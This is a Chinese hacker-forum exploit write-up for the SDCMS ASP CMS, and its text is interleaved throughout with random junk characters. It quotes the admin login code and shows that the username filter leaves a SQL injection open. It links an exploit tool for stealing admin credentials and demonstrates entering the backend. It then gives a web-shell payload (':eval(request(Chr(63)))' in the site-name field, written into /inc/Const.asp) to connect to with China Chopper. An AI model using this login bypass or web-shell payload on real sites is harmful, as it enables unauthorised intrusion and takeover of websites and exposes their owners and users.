作者:T00LS 鬼哥
2 {. m. D" O$ o1 [% B- N3 L漏洞文件:后台目录/index.asp
. @) q2 p" F, O. c( D
; @8 | h6 h& W6 f! g# u' _Sub Check3 D5 @5 m# x( n/ B1 I
Dim username,password,code,getcode,Rs
S" R8 r# `& f0 z1 a' F. b% v$ c IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
+ h& N0 P) _, q" b/ e username=FilterText(Trim(Request.Form("username")),1)8 _- Z& n2 j- k% w1 i! Y8 S, S
password=FilterText(Trim(Request.Form("password")),1)
( Q- U! S7 _$ F6 X code=Trim(Request.Form("yzm"))7 W( N) H6 @+ w8 I* p
getcode=Session("SDCMSCode")8 B3 ? Z8 g. B; M
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died: q( A* \( ^3 [4 n' o8 H9 j* S3 N5 c
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied* J+ R! D) Z* r8 E& v
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied/ ]2 M. Q$ N" a8 Q3 S* Y& H/ i- P7 G
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied
( l# X6 u, U) B4 m" H* N9 T IF username="" or password="" Then
3 b$ ]! g& w' h1 \+ V! g7 O H' K Echo "用户名或密码不能为空" ied
' R6 F6 @* ~; k# Y( W Else9 M: e5 E' ?! u w9 }3 k
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
! `" _3 j( K/ Q2 g3 `- { IF Rs.Eof Then
. @9 M, o1 w( | AddLog username,GetIp,"登录失败",1
$ [% c, s- T- X Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会", h% ~; f( i4 u8 s/ ]4 y+ l
Else" K5 d+ O, H) l5 p% _3 W) e
Add_Cookies "sdcms_id",Rs(0)
: d3 G- T' n. t$ a2 [% n Add_Cookies "sdcms_name",username5 y0 G* e2 a! M' j! Y" X. x
Add_Cookies "sdcms_pwd",Rs(2)6 e4 H$ Z7 g# f8 _, Y. V) C4 C
Add_Cookies "sdcms_admin",Rs(3)
) d! H( Q$ |' E, o5 ~" r u Add_Cookies "sdcms_alllever",Rs(4)
1 y. x5 V7 n2 a/ E) J# [7 F Add_Cookies "sdcms_infolever",Rs(5)
6 _# W! i# B. I+ N( O* Q; C Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")3 U U$ A1 ]6 x
AddLog username,GetIp,"登录成功",1
7 R- m) U; m! ?3 @& G5 i- p% K" Y '自动删除30天前的Log记录* z k2 z8 H! y
IF Sdcms_DataType Then* C3 z1 Q) N! S
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")9 [/ B/ ~" G. w& W
Else9 `' x' y' j% t% Z
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
2 p% W2 K A) T8 |$ [0 y; `) i: U End IF
5 W }- @. ~. s6 v1 }3 _: ~4 Y Go("sdcms_index.asp")
' @2 M7 S& n( a% k- y End IF
. {" u5 \7 t% r$ _! o0 ]5 ~3 Z. F Rs.Close
; |5 L' d* e. J$ y7 V& Y Set Rs=Nothing Y2 G! b& f4 E; i7 V* E
End IF
' s% P B* g9 K4 W4 gEnd Sub+ n9 }$ J0 U6 d. I, Q7 n0 S/ L
' ]) Y+ U) G5 b
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码; K* }- y. ]# C3 f. o
% _6 A& ~- q* j* w1 ]. B' e6 z/ `Function FilterText(ByVal t0,ByVal t1)
3 s; {2 v; X$ i IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
( N' h/ G% m- L2 r$ F3 q$ [ d- C8 h t0=Trim(t0)8 U( ~8 t; | x/ d
Select Case t1
6 C$ _; A8 _! k. h* C5 n Case "1"
9 Y) z# t7 k# y8 [1 K' h t0=Replace(t0,Chr(32),"")/ I2 j4 `/ ~1 y9 x& }
t0=Replace(t0,Chr(13),"")2 p/ }8 }6 h$ r, t; a
t0=Replace(t0,Chr(10)&Chr(10),"")( T8 Y2 ^* p6 ]9 w6 I+ m
t0=Replace(t0,Chr(10),"")
7 ?0 G% X% ]" L6 B6 b Case "2"( D2 q8 S0 q" W# A
t0=Replace(t0,Chr(8),"")'回格9 q" l( q* W: @2 G; Q
t0=Replace(t0,Chr(9),"")'tab(水平制表符)$ U& h! D i0 y" W0 a6 l
t0=Replace(t0,Chr(10),"")'换行
8 w- I9 Y' k3 F$ K { t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
9 ^# d2 O+ u& t t0=Replace(t0,Chr(12),"")'换页
. }- J* E' E1 [6 c) @& H3 }+ ^ t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
, v0 [" R: g, j9 N, C$ {) ]) I; P+ ] t0=Replace(t0,Chr(22),""), l2 U! q8 ~- _2 b
t0=Replace(t0,Chr(32),"")'空格 SPACE) N! ~4 f% D; `! m2 ~* R* ~9 z
t0=Replace(t0,Chr(33),"")'!+ [- o C& _6 R( |1 J) [0 C
t0=Replace(t0,Chr(34),"")'"
+ d6 e. s6 h2 U6 X1 `# J9 R" P t0=Replace(t0,Chr(35),"")'#/ R* J7 Q5 ~6 v8 l1 U
t0=Replace(t0,Chr(36),"")'$
& ^. Z0 F2 H3 L/ V, z) k7 M t0=Replace(t0,Chr(37),"")'%* g7 j: i5 R0 v/ E. I8 _9 y! Y
t0=Replace(t0,Chr(38),"")'&4 @) g E+ o& [
t0=Replace(t0,Chr(39),"")''3 C1 ?: y/ T r7 m- Z
t0=Replace(t0,Chr(40),"")'(: x2 Q8 x3 |$ q+ n# f
t0=Replace(t0,Chr(41),"")')
6 H- o. {7 ] j7 b$ {) e t0=Replace(t0,Chr(42),"")'*5 J% v/ r" G) s+ K
t0=Replace(t0,Chr(43),"")'+! I1 V7 i2 R" M6 j8 M' C
t0=Replace(t0,Chr(44),"")',2 i# S( @' m! `" R& y' u
t0=Replace(t0,Chr(45),"")'-
8 F. P/ o3 }* u t0=Replace(t0,Chr(46),"")'.7 F, L' s G- H2 u6 Z
t0=Replace(t0,Chr(47),"")'/. a7 I/ N/ t7 _1 A
t0=Replace(t0,Chr(58),"")':6 b' d5 c. _5 e/ |! d
t0=Replace(t0,Chr(59),"")';
2 M+ x K+ r' g3 e& [ t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
6 g# o+ a1 }5 e) Q6 t Q9 ]: @ t0=Replace(t0,Chr(63),"")'?$ X) |4 \8 {& F6 z7 w* }7 Y
t0=Replace(t0,Chr(64),"")'@
; ^6 f' C6 B. P2 B, `% n t0=Replace(t0,Chr(91),"")'\9 a* T9 n/ l. k! j* A( v) w
t0=Replace(t0,Chr(92),"")'\9 w& W( k0 d( h
t0=Replace(t0,Chr(93),"")']
2 E2 Q2 C$ ^$ U( } l7 N* w t0=Replace(t0,Chr(94),"")'^
, K9 D1 e; Z# p k8 W* P8 a7 }1 c1 f6 ^ t0=Replace(t0,Chr(95),"")'_
% u6 P7 h9 K" X% b' C$ N- p) N! U t0=Replace(t0,Chr(96),"")'`
: A# g/ w- j) j, h- c' [ t0=Replace(t0,Chr(123),"")'{, A2 }" [2 Z2 M6 r, W* H; K) u
t0=Replace(t0,Chr(124),"")'|5 g4 E" y" O% Q3 ~9 B" G! }
t0=Replace(t0,Chr(125),"")'}
5 I% v+ e/ r4 S4 L1 U" Q# l t0=Replace(t0,Chr(126),"")'~
1 Y+ @$ u6 a; E9 ]! T/ g# s Case Else, \) D. q- S0 S+ A; y
t0=Replace(t0, "&", "&"): ]% P) q, n. f
t0=Replace(t0, "'", "'"): q5 h" W5 `9 y2 C/ E
t0=Replace(t0, """", """)8 u8 x: J2 k( R6 X0 e- y& g9 d' \7 j
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
# ?! `- h+ f ^; S0 t End Select, H' F0 k* Y& L+ c" v! j
IF Instr(Lcase(t0),"expression")>0 Then
2 L2 T4 _: ~9 K `+ N7 j t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
* U4 t. [! n' e0 y' Z; O0 b0 T" U+ f End If
0 u' C+ n# [* M FilterText=t0
- c! y$ Y2 m) {; |8 p4 gEnd Function
n: z2 F* t" g! B+ U* L; @6 f* q- }, t# ^6 B5 J3 G
看到没。直接参数是1 只过滤! J4 t* b& T3 E, }5 k& h
t0=Replace(t0,Chr(32)," ")
k2 N5 J6 `( R# ?; ]; y t0=Replace(t0,Chr(13),"")* P2 e' C; H& v
t0=Replace(t0,Chr(10)&Chr(10),"
/ s Y: m$ K: O/ ]3 N( Y3 K")
& `) N! R4 I( ]) g- N t0=Replace(t0,Chr(10),"
6 c" u8 N; \- d Y")
: q( e: v4 _* N4 l0 E漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
. @1 n& ]8 s5 OEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP8 @- g5 t* X i) J
8 [2 m* d2 O* U" @9 p
测试:0 Q* ?; [: Y1 h- o
/ p. J4 P; r2 l1 u% j
: V+ D- f5 e9 T* [" H现在输入工具上验证码,然后点OK
2 T2 G" ~7 |2 ]) k
9 `: G- n+ b) T5 \7 g* w4 U; X b+ ~/ M' H, z7 R" X7 b
看到我们直接进入后台管理界面了,呵呵!
; j' M: I# o! B6 \. q3 J C4 k! S" O4 b
3 t; [$ r, C: F* p9 N# G* C0 I
; v/ A" v' x2 G* y- B. }' Q5 ^9 d4 W+ \这样直接进入后台了。。。。' v) R# j4 e% n. L7 I+ f8 o
( x! p5 u& M$ B7 d+ P, Q
% X2 ?" G5 u: Z. N3 P7 ^7 X- d0 a, y" J- T: l
SDCMS提权:% o) }8 Q, {7 w3 \
; Y. P! e5 P8 j6 J- j
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?* m2 ]: |# o- u4 L
! o8 c, e' p; e# E2 r! Y1 } b
$ y- H2 O* }: F: E. ?7 L$ _
4 c6 ?+ F$ d( ^! ]5 o6 z5 |! [: [OK,现在用菜刀连接下!7 _/ j/ S6 H4 B9 L" T
- M5 l: M# A' y7 R4 F
& _9 H( {' o) l% B; ]' m
5 t+ P3 U; L, F v: ~3 @: T
6 g- ~7 |' N4 Z6 `+ G: I- N5 i" V+ Q ^2 e$ m# H1 `
|